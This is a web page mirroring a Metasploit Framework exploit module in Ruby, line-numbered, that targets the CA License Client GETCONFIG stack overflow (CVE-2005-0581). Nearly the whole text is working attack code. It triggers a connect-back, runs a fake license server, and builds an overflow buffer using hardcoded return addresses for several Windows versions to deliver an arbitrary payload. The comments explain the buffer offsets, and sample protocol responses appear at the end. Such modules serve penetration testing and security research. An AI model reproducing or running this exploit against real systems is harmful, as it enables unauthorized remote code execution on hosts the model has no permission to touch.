Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/license/calicclnt_getconfig.rb
19515 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name'	=> 'Computer Associates License Client GETCONFIG Overflow',

16
        'Description'	=> %q{

17
          This module exploits a vulnerability in the CA License Client

18
          service. This exploit will only work if your IP address can be

19
          resolved from the target system point of view. This can be

20
          accomplished on a local network by running the 'nmbd' service

21
          that comes with Samba. If you are running this exploit from

22
          Windows and do not filter udp port 137, this should not be a

23
          problem (if the target is on the same network segment). Due to

24
          the bugginess of the software, you are only allowed one connection

25
          to the agent port before it starts ignoring you. If it wasn't for this

26
          issue, it would be possible to repeatedly exploit this bug.

27
        },

28
        'Author' => [

29
          'hdm', # original msf v2 module

30
          'aushack', # msf v3 port :)

31
        ],

32
        'License' => MSF_LICENSE,

33
        'References' => [

34
          [ 'CVE', '2005-0581' ],

35
          [ 'OSVDB', '14389' ],

36
          [ 'BID', '12705' ],

37
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],

38
        ],

39
        'Privileged' => true,

40
        'DefaultOptions' => {

41
          'EXITFUNC' => 'process',

42
        },

43
        'Payload' => {

44
          'Space'	=> 600,

45
          'BadChars' => "\x00\x20",

46
          'StackAdjustment' => -3500,

47


48
        },

49
        'Platform'	=> 'win',

50
        'Targets' => [

51
          # As much as I would like to return back to the DLL or EXE,

52
          # all of those modules have a leading NULL in the

53
          # loaded @ address :(

54
          # name, jmp esi, writable, jmp edi

55
          # ['Automatic', {} ],

56
          #

57
          # aushack - tested OK Windows XP English SP0-1 only 20100214

58
          ['Windows 2000 English',	{ 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi

59
          ['Windows XP English SP0-1',	{ 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi

60
          ['Windows XP English SP2',	{ 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi

61
          ['Windows 2003 English SP0',	{ 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi

62
        ],

63
        'DisclosureDate' => '2005-03-02',

64
        'Notes' => {

65
          'Reliability' => UNKNOWN_RELIABILITY,

66
          'Stability' => UNKNOWN_STABILITY,

67
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

68
        }

69
      )

70
    )

71


72
    register_options(

73
      [

74
        Opt::RPORT(10203),

75
        OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]),

76
      ]

77
    )

78
  end

79


80
  # def check

81
  # It is possible to check, but due to a software bug, checking prevents exploitation

82
  # end

83


84
  def exploit

85
    if (connect)

86
      sock.put("A0 GETSERVER<EOM>\n")

87
      print_status("Initial packet sent to remote agent...")

88
      disconnect

89


90
      fakecaservice = Rex::Socket::TcpServer.create(

91
        'LocalHost' => '0.0.0.0',

92
        'LocalPort' => datastore['SRVPORT'],

93
        'SSL' => false,

94
        'Context' =>

95
          {

96
            'Msf' => framework,

97
            'MsfExploit' => self,

98
          }

99
      )

100


101
      add_socket(fakecaservice)

102


103
      fakecaservice.start

104
      print_status("Waiting for the license agent to connect back...")

105
      begin

106
        Timeout.timeout(3) do

107
          done = false

108
          while (not done and session = fakecaservice.accept)

109
            print_status("Accepted connection from agent #{Rex::Socket.source_address(rhost)}..")

110
            session.put("A0 GETCONFIG SELF 0<EOM>")

111
            req = session.recvfrom(2000)[0]

112
            next if not req

113
            next if req.empty?

114


115
            if (req =~ /OS\<([^\>]+)/)

116
              print_status("Target reports OS: #{$1}")

117
            end

118


119
            # exploits two different versions at once >:-)

120
            # 144 -> return address of esi points to string middle

121
            # 196 -> return address of edi points to string beginning

122
            # 148 -> avoid exception by patching with writable address

123
            # 928 -> seh handler (not useful under XP SP2)

124
            buff = rand_text_alphanumeric(900)

125
            buff[142, 2] = Rex::Arch::X86.jmp_short(8)	# jmp over addresses

126
            buff[144, 4] = [target['Rets'][0]].pack('V')	# jmp esi

127
            buff[148, 4] = [target['Rets'][1]].pack('V')	# writable address

128
            buff[194, 2] = Rex::Arch::X86.jmp_short(4)	# jmp over address

129
            buff[196, 4] = [target['Rets'][2]].pack('V')	# jmp edi

130
            buff[272, payload.encoded.length] = payload.encoded

131


132
            sploit = "A0 GETCONFIG SELF #{buff}<EOM>"

133
            session.put(sploit)

134
            session.close

135
          end

136
        end

137
      ensure

138
        handler

139
        fakecaservice.close

140
        return

141
      end

142
    end

143
  end

144
end

145


146
=begin

147
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>

148
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>

149
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>

150
=end

151


152